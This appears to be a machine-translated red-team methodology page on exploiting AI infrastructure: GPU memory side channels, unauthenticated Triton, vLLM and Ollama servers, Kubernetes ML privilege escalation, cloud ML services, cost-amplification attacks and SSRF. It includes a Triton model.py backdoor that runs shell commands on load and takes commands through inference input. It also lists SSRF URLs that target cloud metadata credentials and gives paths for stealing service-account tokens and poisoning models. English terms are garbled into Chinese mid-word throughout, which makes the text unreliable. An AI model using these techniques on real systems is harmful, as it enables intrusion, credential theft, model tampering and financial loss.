AI Infrastructure 利用ation
Methodology for exploiting GPU clusters, model serving frameworks (Triton, vLLM, Ollama), Kubernetes ML platforms, cloud AI services, and cost amplification attacks.
AI Infrastructure 利用
AI infrastructure combines traditional attack surfaces with AI-specific concerns: model serving frameworks with unauthenticated APIs, GPU drivers with kernel-level access, multi-tenant 推論 platforms with shared memory, and 雲端 AI services with billing models ripe for cost amplification.
Infrastructure 攻擊 Surfaces
AI infrastructure spans several distinct target categories, each with unique 利用 characteristics.
Model serving frameworks (Triton, vLLM, Ollama) are frequently deployed without 認證, exposing model enumeration, configuration details, and 推論 endpoints. The highest-severity risk is code execution through custom backends -- Triton's Python backend runs arbitrary code during model load and 推論. Unauthenticated management APIs allow loading 攻擊者-controlled models, making any exposed model server a potential foothold into the 推論 infrastructure.
GPU clusters introduce hardware-level attack surfaces absent from traditional infrastructure. Uninitialized GPU memory can contain data from previous tenants (model weights, 訓練資料, API keys). NVLink and NVSwitch fabrics enable peer-to-peer memory access across GPUs if isolation is not enforced. CUDA IPC handles allow cross-process GPU memory access. NVIDIA DCGM management APIs on port 5555 provide cluster-wide GPU control when exposed without 認證.
ML pipelines on Kubernetes commonly over-provision 權限, granting cluster-admin to 訓練 job service accounts. Shared storage mounts (/models, /data, /checkpoints) enable lateral movement from a compromised 訓練 job to production model replacement or 資料投毒. CI/CD systems that automate 訓練 and deployment are high-value targets -- compromising the pipeline produces persistent, automated 後門 injection across all future model versions.
GPU Cluster 攻擊
攻擊 Surface Enumeration
From a compromised container, enumerate the GPU infrastructure:
| Component | What to Check | How |
|---|---|---|
| GPU hardware & driver | Model, driver version, compute mode, MIG status | nvidia-smi --query-gpu=name,driver_version,memory.total,compute_mode,mig.mode.current --format=csv |
| CUDA version | Known 漏洞 in specific versions | nvcc --version |
| DCGM exposure | DCGM management API on port 5555 | TCP connect to localhost:5555 |
| NCCL config | Multi-GPU communication settings | Check NCCL_* environment variables |
| NVLink/NVSwitch | Peer-to-peer GPU memory access, isolation gaps | Check for enabled CUDA IPC handles |
GPU Memory Side Channels
Memory remnants: Allocate uninitialized GPU memory via torch.empty(1024, 1024, device='cuda') and scan for non-zero values. On shared infrastructure, previous tenants' model weights, 訓練資料, and API keys may be recoverable.
Timing attacks: Measure allocation latency over many iterations. Bimodal distribution in allocation times indicates co-tenant interference, revealing workload patterns and memory pressure.
NVLink/NVSwitch Risks
| Risk | Description |
|---|---|
| Peer-to-peer memory access | NVLink-connected GPUs can access each other's memory if peer access is enabled |
| NVSwitch fabric | Any-to-any GPU memory access across the fabric |
| CUDA IPC handles | Shared GPU memory between processes via file descriptors; if 攻擊者 obtains the handle, they read/write another process's GPU memory |
Model Serving 漏洞
Reconnaissance Methodology
識別 the serving framework
Probe common endpoints to determine which framework is running.
Framework Health Endpoint Default Port Triton /v2/health/ready8000 (HTTP), 8001 (gRPC) vLLM /health8000 Ollama /api/tags11434 Check for 認證
Most model serving frameworks deploy without 認證 by default. 測試 unauthenticated access to model listing and 推論 endpoints.
Enumerate models and configurations
Extract model names, architectures, 輸入/輸出 specs, and backend types. Look for Python backends (code execution) and ensemble pipelines.
測試 for exploitable features
Check model control APIs (load/unload), metrics endpoints (information disclosure), and custom backend execution.
Framework-Specific 攻擊
Triton is the most feature-rich target:
| Endpoint | Risk |
|---|---|
GET /v2/models | Model enumeration without auth |
GET /v2/models/\{name\}/config | Architecture details, backend type, file paths |
POST /v2/repository/index | Full model repository listing |
| Model control API | Load/unload arbitrary models |
Critical risk: Triton's Python backend executes arbitrary code. If you can place a model in the repository, model.py runs during 推論:
# model.py in Triton's model repository
class TritonPythonModel:
def initialize(self, args):
os.system('id > /tmp/pwned') # Runs on model load
def execute(self, requests):
# Use 推論 輸入 as command channel
cmd = pb_utils.get_input_tensor_by_name(
requests[0], 'INPUT').as_numpy()[0].decode()
輸出 = subprocess.getoutput(cmd)vLLM exposes an OpenAI-compatible API, typically without 認證:
| Check | Endpoint | Risk |
|---|---|---|
| Model listing | GET /v1/models | Information disclosure |
| Health/metrics | GET /metrics | GPU count, memory, request patterns, architecture |
| Inference | POST /v1/chat/completions | Compute abuse, 系統提示詞 extraction |
測試 for 系統提示詞 override by sending a system message that contradicts the deployment's intended prompt.
Ollama binds to localhost by default but is often exposed on 0.0.0.0 with no 認證:
| Action | Endpoint | Impact |
|---|---|---|
| List models | GET /api/tags | Enumeration |
| Pull models | POST /api/pull | Bandwidth/storage abuse |
| Create models | POST /api/create | Custom Modelfile execution |
| Delete models | DELETE /api/delete | Denial of service |
| Run 推論 | POST /api/generate | Compute abuse |
Kubernetes ML Platform 攻擊
Privilege Escalation from ML Pods
ML pods commonly have excessive 權限. After compromising a 訓練 job, enumerate Kubernetes access:
Read the service account 符元
Check
/var/run/secrets/kubernetes.io/serviceaccount/符元. ML platform service accounts are frequently bound tocluster-admin.Enumerate accessible resources
測試 access to cluster-wide secrets, pods, nodes, namespaces, and deployments using the service account 符元 against the Kubernetes API.
Access shared storage
Check common ML mount points for lateral access.
Shared Storage 攻擊 Paths
| Mount Point | Typical Content | 利用 |
|---|---|---|
/models | Shared model registry | Replace production models with trojaned versions |
/data | Training datasets | Poison 訓練資料 |
/checkpoints | Training checkpoints | Inject backdoored checkpoints |
/artifacts | MLflow/W&B artifacts | Redirect model deployments |
/home/jovyan | JupyterHub home directories | Access other users' notebooks and credentials |
雲端 AI Service 利用
雲端-Specific 攻擊 Surfaces
| 雲端 Service | Entry Points | Escalation Paths |
|---|---|---|
| AWS SageMaker | Notebook instances (Jupyter + IAM role), 訓練 jobs (S3/ECR access), endpoints (SSRF) | Enumerate endpoints, models, 訓練 jobs; pivot via IAM role |
| GCP Vertex AI | Notebook instances, custom 訓練 containers, model endpoints | Service account impersonation, GCS bucket access |
| Azure ML | Compute instances, managed endpoints, datastores | Managed identity abuse, blob storage access |
From a compromised SageMaker notebook, enumerate all endpoints (deployed models), models (with S3 artifact paths), and 訓練 jobs (with IAM roles and hyperparameters) via the boto3 SageMaker client.
Cost Amplification 攻擊
| 攻擊 Vector | Mechanism | Estimated Hourly Cost |
|---|---|---|
| GPU 推論 abuse | Max-length requests at max throughput to GPU endpoints | ~$360 (10 req/s x $0.01) |
| Training job spawn | Launch multi-GPU 訓練 jobs via compromised credentials | ~$500 per job (10 parallel) |
| Model download abuse | Repeated downloads of large models to trigger egress charges | ~$540 (100GB x 60 downloads x $0.09/GB) |
| 嵌入向量 API abuse | Max-size batches to 嵌入向量 endpoints continuously | Varies by provider |
Inference Service SSRF
Model serving endpoints that accept URLs as 輸入 (image classification, web scraping, document processing) are SSRF vectors.
Priority SSRF Targets
| Target | URL | What You Get |
|---|---|---|
| AWS IMDS | http://169.254.169.254/latest/meta-data/iam/安全-credentials/ | IAM credentials |
| GCP metadata | http://metadata.google.internal/computeMetadata/v1/ | Service account 符元 |
| Azure IMDS | http://169.254.169.254/metadata/identity/oauth2/符元 | Managed identity 符元 |
| Kubernetes API | http://kubernetes.default.svc/api/v1/namespaces | Cluster enumeration |
| Internal Triton | http://triton-server.internal:8000/v2/models | Model enumeration |
| Internal Ollama | http://localhost:11434/api/tags | Local model listing |
You discover an NVIDIA Triton server exposed without 認證. Which finding represents the highest severity risk?
相關主題
- AI Supply Chain 利用 -- 供應鏈 attacks that compromise infrastructure from within
- AI Application 安全 -- Application-layer 漏洞 on infrastructure endpoints
- MCP Tool 利用 -- MCP servers running on exploitable infrastructure
- Advanced Reconnaissance -- Fingerprinting model serving frameworks as recon targets
參考文獻
- OWASP Machine Learning 安全 Top 10 — ML infrastructure risks
- NVIDIA Triton Inference Server — Model serving infrastructure
- Kubernetes 安全 最佳實務 (CISA, 2022) — K8s 安全 for ML clusters